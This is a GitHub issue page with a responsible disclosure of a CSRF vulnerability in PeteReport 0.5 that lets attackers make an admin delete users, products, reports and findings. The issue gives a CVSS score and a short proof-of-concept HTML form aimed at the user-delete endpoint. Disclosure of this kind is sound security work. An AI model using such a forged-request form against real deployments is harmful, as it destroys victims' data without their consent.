Skip to content

Security Issue - CSRF (Delete user,product,etc) #34

Closed
@alestorm980

Description

@alestorm980

Hi I am a security researcher at Fluid Attacks, our security team found a security issue inside PeteReport version 0.5.

Attached below are the links to our responsible disclosure policy.

Bug description

PeteReport Version 0.5 contains a Cross Site Request Forgery (CSRF) vulnerability allowing an attacker to trick users into deleting users, products, reports and findings in the application.

CVSSv3 Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVSSv3 Base Score:

4.3

Steps to reproduce

  1. Create a malicious html file with the following content.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <!--Change ID -->
    <form action="https://127.0.0.1/configuration/user/delete/:id">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  1. If an authenticated admin visits the malicious url, the user with the correspond id will be deleted

Screenshots and files

evidence

delete_user_html

System Information

  • Version: PeteReport Version 0.5.
  • Operating System: Docker.
  • Web Server: nginx.

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions